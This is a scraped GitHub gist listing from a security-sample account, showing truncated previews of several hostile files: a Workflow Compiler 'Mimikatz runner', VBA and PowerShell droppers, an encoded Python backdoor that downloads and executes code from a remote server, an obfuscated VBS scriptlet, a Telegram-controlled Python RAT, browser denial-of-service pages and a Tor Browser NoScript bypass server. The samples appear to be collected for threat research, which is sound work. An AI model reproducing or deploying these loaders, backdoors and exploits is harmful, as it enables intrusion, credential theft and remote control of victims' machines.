Skip to content

Instantly share code, notes, and snippets.

View seclib's full-sized avatar

Seclib seclib

25 followers · 4 following
View GitHub Profile
@seclib
seclib / Microsoft.Workflow.Compiler.exe
Created August 19, 2018 12:58
Microsoft.Workflow.Compiler.exe Mimikatz Runner. Base on https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>test.xoml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@seclib
seclib / dfcfbvgd454gn56h4yh8
Created August 23, 2018 13:51
VBA + PS1 threat
## upload by @satya_enki
## VBA:
Private Sub WorkBook_Open()
Call VVVV
Application.Wait (Now + TimeValue("0:00:10"))
Call AAAA
@seclib
seclib / dfhgtyujutqzoiaeoi
Created August 28, 2018 05:04
Python backdoor
## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection
var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm'''
import re
# Matches everything between two texts, returns the first match, Returns: str or False
var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWtnaURua0RlQ3AxM3R0MWJGN
@seclib
seclib / ps1_file
Created August 28, 2018 05:10
2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
## Hash: 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
## VT Link: https://www.virustotal.com/#/file/2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132/detection
## Original file
$YHRIul = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4xNDg="))
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$gxPVX = [System.Convert]::FromBase64String("H4sIAAAAAAACC+1Ye2wcRxn/9r17ti9Zn3t3cXq+S/PoNW6ujp02rZSCE9u0TuLYiZ3EdmiT9d3G3uS8e9lbu3GBKIhQUaGmtVBKW1KrPFRVgAoIJAIFiao8WqCIBhCISihUolSqACEeQiAIv5nd8yM2rdQ/+AfWvm++13zP2Zm56xt9hCQikvG5epXoEoVPJ739cxafePbrcfqK8fK6S8Lel9cNTTjVXMX3xn1rMle0XNcLcmN2zp9yc46b6+4fzE16JbvQ0BDbENkY6CHaK0j0929Vj9TsXiFxXZ2gEzWBUEPeXAdArhZYZ4iLYdxECyMPSgxRiTo/TLSa/y+M80PoH3b3RCYfE1dI8hhRPb2DB/Hpi0gd9N2L6EJgnw4wfiYR5dW0EPciE8cKftUvUhRbZ5Rocqke2J0F3y57xSjWY5Gt5mV6u5b1sCMc7+ZTFHojTzQRIxLonT2JNpleJz7fzCPWmKcAxPIqQzUGUJVY6qE6qCRkU05mtzxpyp4BZl0VfmP1ehWyWIOhNT+Rr2cTGgAMbe0S6vrFVD4OmF/F6NUMgxk1lKQ8MxwaGR+l
@seclib
seclib / hgdhsfhgdjgoyikho
Created August 31, 2018 07:07
VBS COM Scriptlet threat
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
q=115
w="125128225226220231214225232185147215225216125128210231147176147170218125128217220147215225216125128149149147176147210231125128216230223216125128223223212215212216229161229229216215231230161165214147176147210231125128225216219231147224212216229231230217226215225216231212161229229216215231230161165214147231226225147217220216230223216125128223223212215212216229161231232226215231230161165214147176147210231125128225216219231147224212216229231230217226215225216231212161231232226215231230161165214147231226225147217220125128156171220147153147149147214162147152214216227230224226214152149155147214216235216161170229147176147165214147231216230125128210231159165214159166235147224220215125128156171220155147170218147225226220231214225232217125128213232230147215225216125128164220147229216215223226217216231216223216215161164234125128164220147216223220217216
@seclib
seclib / 4rfdt45gbh4,j+hu47;9+i8uo9+!m8!9+5
Created September 9, 2018 10:59
Python RAT (https://github.com/mvrozanti/RAT-via-Telegram)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
@seclib
seclib / ubDoS.html
Created September 11, 2018 15:26
Universal Browser DoS
<title>Title / History</title>
<script>
if (navigator.userAgent.indexOf('Chrome') == -1 && navigator.userAgent.indexOf('Safari') > -1) {
if(!String.prototype.repeat){(function(){'use strict';
var defineProperty=(function(){try{var object={};
var $defineProperty=Object.defineProperty;
var result=$defineProperty(object,object,object)&&$defineProperty}catch(error){}return result}());
var repeat=function(count){if(this==null){throw TypeError()}
var string=String(this);
@seclib
seclib / torbb.py
Created September 11, 2018 16:47
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
@seclib
seclib / seclib_safary_dead.html
Created September 17, 2018 12:51
Safari DoS ☠️
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA
@seclib
seclib / ccddef1beae0d1c7962b1783003
Created September 21, 2018 06:27
VBA XLS Threat
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
===============================================================================
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'